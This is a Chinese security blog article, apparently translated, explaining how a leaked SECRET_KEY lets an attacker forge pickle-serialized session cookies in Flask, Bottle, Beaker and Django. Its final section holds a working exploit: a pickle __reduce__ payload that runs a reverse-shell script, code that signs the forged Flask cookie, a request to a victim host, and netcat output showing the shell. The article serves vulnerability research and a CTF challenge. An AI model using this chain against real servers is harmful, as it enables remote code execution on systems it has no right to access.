
對于Python的框架中一些會話程序的管理
Django, Bottle, Flask,等所有的python web框架都需要配置一個SECRET_KEY。文檔通常推薦我們使用隨機的值,但我很難發(fā)現(xiàn)他有任何文字說明,因為這樣容易被破解(本地攻擊或者文本閱讀在web app中更容易受攻擊)。攻擊者可以使用SECRET_KEY偽造cookies,csrf token然后使用管理員工具。不過這很難做到,不過他可以搞一些小破壞,比如執(zhí)行惡意代碼。這也是我下面將要介紹的。
記得以前使用PHP找到一個可以讀服務器上任意文件的bug(不包含本地文件),你將會被迫選擇遠程執(zhí)行代碼(RCE)。你就需要審查大部分的app資源文件來找到其他的bugs或者有用的信息(比如說用戶密碼,或者數(shù)據(jù)庫信息等)。在這個情況下,我們能說PHP是更安全的嗎?
在攻擊一個Python網(wǎng)站框架的時候,知道你設置的SECRET_KEY字段的攻擊者,能夠簡單的將LFR攻擊升級到RCE攻擊。我(作者)是從攻擊一系列的網(wǎng)站框架之后得出如上結(jié)論的。在這些網(wǎng)站框架中,都有雷同的,使用Pickle作為將經(jīng)過簽名的Cookie序列化的方式。
在Flask框架中,F(xiàn)lask在config['SECRET_KEY']被賦予某個值,session_cookie_name(default='session')存在于cookie中的時候,將Cookie反序列化,甚至在沒有session的情況下。(這樣多么好,攻擊者可以僅僅通過向config file添加SECRET_KEY的方式制造后門,并且,天真的用戶將認為這非常'重要')
從 werkzeug library 里面提取出來的反序列方法是這樣的:
def unserialize(cls, string, secret_key):
if isinstance(string, unicode):
string = string.encode('utf-8', 'replace')
try:
base64_hash, data = string.split('?', 1)
except (ValueError, IndexError):
items = ()
else:
items = {}
mac = hmac(secret_key, None, cls.hash_method)
# -- snip ---
try:
client_hash = base64_hash.decode('base64')
except Exception:
items = client_hash = None
if items is not None and safe_str_cmp(client_hash, mac.digest()):
try:
for key, value in items.iteritems():
items[key] = cls.unquote(value)
except UnquoteError:
# -- snip --
else:
items = ()
return cls(items, secret_key, False)
反序列方法檢查簽名,然后在簽名正確的情況下unquote()cookie的值。unquote()方法看起來非常無辜,但是事實上,這是一個默認的pickle.
#: the module used for serialization. Unless overriden by subclasses
#: the standard pickle module is used.
serialization_method = pickle
def unquote(cls, value):
# -- snip --
if cls.quote_base64:
value = value.decode('base64')
if cls.serialization_method is not None:
value = cls.serialization_method.loads(value)
return value
# -- snip --
Bottle: 在默認的bottle設定中時沒有真正的secret key的,但是也許有人想要用signed cookie的功能來加密他自己的cookie.
讓我們來看看代碼是怎么樣的:
def get_cookie(self, key, default=None, secret=None):
value = self.cookies.get(key)
if secret and value:
dec = cookie_decode(value, secret) # (key, value) tuple or None
return dec[1] if dec and dec[0] == key else default
return value or default
當這個密鑰被展現(xiàn)出來的時候,并且在cookie中還有其他數(shù)值的時候,cookie_decode 方法被調(diào)用:
def cookie_decode(data, key):
data = tob(data)
if cookie_is_encoded(data):
sig, msg = data.split(tob('?'), 1)
if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(key), msg).digest())):
return pickle.loads(base64.b64decode(msg))
return None
再次,我們看到了Pickle !
Beaker 的session:(任何服務都可以在session上使用beaker的中間件,bottle框架甚至推薦這么做) Beaker.Session 具有很多功能,并且這可能被混淆: 這里面有三個密鑰 secret_key, validate_key, encrypted_key)
encrypt_key: 加密cookie信息,然后要么向客戶端發(fā)送(session.type="cookie"/Cookie mode),要么在(session.type="file"/File mode)中儲存。如果沒有設定encrypt_key,那么cookie不會被加密,只會被base64編碼。當有encrypt_key的時候,cookie會被用encrypted_key, validate_key(可選)和一個隨機值用AES方法加密。
validate_key: 用來給加密的cookie簽名
secret:在用File mode時候給cookie簽名(我不知道為什么他們不就用一個validate_key就好了!)
當然,當有人對文件擁有讀的權限的時候,他/她理所當然知道所有的字段。然而,F(xiàn)ile mode使得攻擊不得能因為我們對已經(jīng)序列化的數(shù)據(jù)并沒有控制權,例如,當這些數(shù)據(jù)儲存在本地硬盤上的時候。在Cookie mode,攻擊就能夠成立,即便cookie被編碼了(因為我們知道怎么encrypt,哈哈)。你也許會問,那個隨機參數(shù)是不可知的,你們沒辦法攻擊,幸運的是這個隨機參數(shù)也是cookie存數(shù)的session數(shù)據(jù)的一部分,因此,我們可以將其替代為任何我們需要的值。
下面是他們構(gòu)造session數(shù)據(jù)的代碼
def _encrypt_data(self, session_data=None):
"""Serialize, encipher, and base64 the session dict"""
session_data = session_data or self.copy()
if self.encrypt_key:
nonce = b64encode(os.urandom(6))[:8]
encrypt_key = crypto.generateCryptoKeys(self.encrypt_key,
self.validate_key + nonce, 1)
data = util.pickle.dumps(session_data, 2)
return nonce + b64encode(crypto.aesEncrypt(data, encrypt_key))
else:
data = util.pickle.dumps(session_data, 2)
return b64encode(data)
我們明顯的看到這些數(shù)據(jù)的處理存在風險。
Django: 最知名也是在Python語言中最復雜的一個服務器框架。而且,沒錯,Django的開發(fā)者們在Cookie Session上放置了一個蠻不錯的警告。以我之鄙見,這個警告不夠,而應該被替換成'致命'或者是'警示',并且標上紅色。
Django的Session是咋么工作的呢?我們能夠從Django的文檔中輕易的找到可閱讀的答案:總而言之,Django給了session 3個可以設定的項目:db,file以及signed_cookie。再一次,我們只對signed_cookie產(chǎn)生興趣,因為我們可以輕松的改變它。如果SESSION_ENGINE被設定為“django.contrib.sessions.backends.signed_cookies“,我們就確定signed_cookie是背用于session的管理。
有趣的是,如果我們在request cookie里面構(gòu)造一個sessionid,它總是會被反序列化。Django也給了我們一個cookie是如何被簽名的好實例。這讓我們的工作輕松多了。
我們的攻擊
我們還沒有討論我們?nèi)绾喂簦ㄓ行┠憧赡芤呀?jīng)知道了)!感謝您的耐心看到最后,我寫它在最后是因為攻擊手段充滿共性,而且簡單(是的,原則性的知識)。
在這里,我們可以讀取任何文件。要找到Python應用程序的配置文件并不難,因為到處有導入(import)。當我們獲得的密鑰時,我們可以簡單的實現(xiàn)(或重復使用)簽署web框架的cookie,并使用我們的惡意代碼。 因為它們使用的是pickle.loads()反序列化的時候,我們的使用pickle.dumps()保存惡意代碼。
piclke.dump()和loads()通常在處理整數(shù),字符串,數(shù)列,哈希,字典類型的時候是安全的....但是他在處理一些惡意構(gòu)造的數(shù)據(jù)類型的時候就不安全了!事實上,攻擊者可以通過構(gòu)造的數(shù)據(jù)類型來達到執(zhí)行任意Python代碼的目的。我寫了一段不錯的小程序來吧Python代碼轉(zhuǎn)換成Pickle序列化的對象。我們應該從connback.py開始閱讀(這實際上是一個反向鏈接的shell),然后我們將誘使對方網(wǎng)站來用Pickle方法將其序列化。如果有人執(zhí)行了pickle.loads(payload),那么我們的反向鏈接shell就會被激活。
code = b64(open('connback.py').read())
class ex(object):
def __reduce__(self):
return ( eval, ('str(eval(compile("%s".decode("base64"),"q","exec"))).strip("None")'%(code),) )
payload = pickle.dumps(ex())
現(xiàn)在我們簽名(適用于flask web框架):
def send_flask(key, payload):
data = 'id='+b64(payload)
mac = b64(hmac(key, '|'+data, hashlib.sha1).digest())
s = '%(sig)s?%(data)s' % {'sig':mac, 'data':data}
然后發(fā)送
print requests.get('http://victim/', cookies={'session':s})
在另外一個終端里:
danghvu@thebeast:~$ nc -lvvv 1337
Connection from x.x.x.x port 1337 [tcp/*] accepted
!P0Wn! Congratulation !!
sh: no job control in this shell
sh-4.1$
還有啥?
-所以怎樣?只要你不知道我的secret_key我就是安全的!可以啊,你可以這樣....但是和宣稱:"我把我的鑰匙放在房頂上,我知道你爬不上來..."沒啥區(qū)別。
-好的, 所以如果我不用這種session cookie,我就安全了!沒錯,在小型的web app上,將session 儲存在文件里面更安全(如果放在DB里面,我們還面臨SQL Injection的危險)。但是如果是大型web app,然后你有個分布式的存儲方式,這將導致嚴重的效率問題。
-那咋辦?也許我們應該讓那些web框架不要用piclke來序列化?我不知道是否存在這種框架,如果有的話就好了。PHP更安全嗎?事實上不是如此
最后:
Web.Py,當我查看他們的web session文檔的時候我發(fā)現(xiàn):CookieHandler – DANGEROUS, UNSECURE, EXPERIMENTAL
所以,干得好:D ,也許所有人都應該這樣做。你們應該去試試web.py和其他框架。
我做了這些,如果你想要讓它奏效你也可以花點時間上去。
作為一個禮物,這個網(wǎng)站是有這個漏洞的,讓我們看看你們是不是能夠把lfr bug升級成為一個rce,然后你們會找到真正的禮物:一個flag...
更新:有漏洞的網(wǎng)站的源碼放在github上了,它的secret_key已經(jīng)不一樣了。
數(shù)據(jù)分析咨詢請掃描二維碼
若不方便掃碼,搜微信號:CDAshujufenxi
SQL Server 中 CONVERT 函數(shù)的日期轉(zhuǎn)換:從基礎用法到實戰(zhàn)優(yōu)化 在 SQL Server 的數(shù)據(jù)處理中,日期格式轉(zhuǎn)換是高頻需求 —— 無論 ...
2025-09-18MySQL 大表拆分與關聯(lián)查詢效率:打破 “拆分必慢” 的認知誤區(qū) 在 MySQL 數(shù)據(jù)庫管理中,“大表” 始終是性能優(yōu)化繞不開的話題。 ...
2025-09-18CDA 數(shù)據(jù)分析師:表結(jié)構(gòu)數(shù)據(jù) “獲取 - 加工 - 使用” 全流程的賦能者 表結(jié)構(gòu)數(shù)據(jù)(如數(shù)據(jù)庫表、Excel 表、CSV 文件)是企業(yè)數(shù)字 ...
2025-09-18DSGE 模型中的 Et:理性預期算子的內(nèi)涵、作用與應用解析 動態(tài)隨機一般均衡(Dynamic Stochastic General Equilibrium, DSGE)模 ...
2025-09-17Python 提取 TIF 中地名的完整指南 一、先明確:TIF 中的地名有哪兩種存在形式? 在開始提取前,需先判斷 TIF 文件的類型 —— ...
2025-09-17CDA 數(shù)據(jù)分析師:解鎖表結(jié)構(gòu)數(shù)據(jù)特征價值的專業(yè)核心 表結(jié)構(gòu)數(shù)據(jù)(以 “行 - 列” 規(guī)范存儲的結(jié)構(gòu)化數(shù)據(jù),如數(shù)據(jù)庫表、Excel 表、 ...
2025-09-17Excel 導入數(shù)據(jù)含缺失值?詳解 dropna 函數(shù)的功能與實戰(zhàn)應用 在用 Python(如 pandas 庫)處理 Excel 數(shù)據(jù)時,“缺失值” 是高頻 ...
2025-09-16深入解析卡方檢驗與 t 檢驗:差異、適用場景與實踐應用 在數(shù)據(jù)分析與統(tǒng)計學領域,假設檢驗是驗證研究假設、判斷數(shù)據(jù)差異是否 “ ...
2025-09-16CDA 數(shù)據(jù)分析師:掌控表格結(jié)構(gòu)數(shù)據(jù)全功能周期的專業(yè)操盤手 表格結(jié)構(gòu)數(shù)據(jù)(以 “行 - 列” 存儲的結(jié)構(gòu)化數(shù)據(jù),如 Excel 表、數(shù)據(jù) ...
2025-09-16MySQL 執(zhí)行計劃中 rows 數(shù)量的準確性解析:原理、影響因素與優(yōu)化 在 MySQL SQL 調(diào)優(yōu)中,EXPLAIN執(zhí)行計劃是核心工具,而其中的row ...
2025-09-15解析 Python 中 Response 對象的 text 與 content:區(qū)別、場景與實踐指南 在 Python 進行 HTTP 網(wǎng)絡請求開發(fā)時(如使用requests ...
2025-09-15CDA 數(shù)據(jù)分析師:激活表格結(jié)構(gòu)數(shù)據(jù)價值的核心操盤手 表格結(jié)構(gòu)數(shù)據(jù)(如 Excel 表格、數(shù)據(jù)庫表)是企業(yè)最基礎、最核心的數(shù)據(jù)形態(tài) ...
2025-09-15Python HTTP 請求工具對比:urllib.request 與 requests 的核心差異與選擇指南 在 Python 處理 HTTP 請求(如接口調(diào)用、數(shù)據(jù)爬取 ...
2025-09-12解決 pd.read_csv 讀取長浮點數(shù)據(jù)的科學計數(shù)法問題 為幫助 Python 數(shù)據(jù)從業(yè)者解決pd.read_csv讀取長浮點數(shù)據(jù)時的科學計數(shù)法問題 ...
2025-09-12CDA 數(shù)據(jù)分析師:業(yè)務數(shù)據(jù)分析步驟的落地者與價值優(yōu)化者 業(yè)務數(shù)據(jù)分析是企業(yè)解決日常運營問題、提升執(zhí)行效率的核心手段,其價值 ...
2025-09-12用 SQL 驗證業(yè)務邏輯:從規(guī)則拆解到數(shù)據(jù)把關的實戰(zhàn)指南 在業(yè)務系統(tǒng)落地過程中,“業(yè)務邏輯” 是連接 “需求設計” 與 “用戶體驗 ...
2025-09-11塔吉特百貨孕婦營銷案例:數(shù)據(jù)驅(qū)動下的精準零售革命與啟示 在零售行業(yè) “流量紅利見頂” 的當下,精準營銷成為企業(yè)突圍的核心方 ...
2025-09-11CDA 數(shù)據(jù)分析師與戰(zhàn)略 / 業(yè)務數(shù)據(jù)分析:概念辨析與協(xié)同價值 在數(shù)據(jù)驅(qū)動決策的體系中,“戰(zhàn)略數(shù)據(jù)分析”“業(yè)務數(shù)據(jù)分析” 是企業(yè) ...
2025-09-11Excel 數(shù)據(jù)聚類分析:從操作實踐到業(yè)務價值挖掘 在數(shù)據(jù)分析場景中,聚類分析作為 “無監(jiān)督分組” 的核心工具,能從雜亂數(shù)據(jù)中挖 ...
2025-09-10統(tǒng)計模型的核心目的:從數(shù)據(jù)解讀到?jīng)Q策支撐的價值導向 統(tǒng)計模型作為數(shù)據(jù)分析的核心工具,并非簡單的 “公式堆砌”,而是圍繞特定 ...
2025-09-10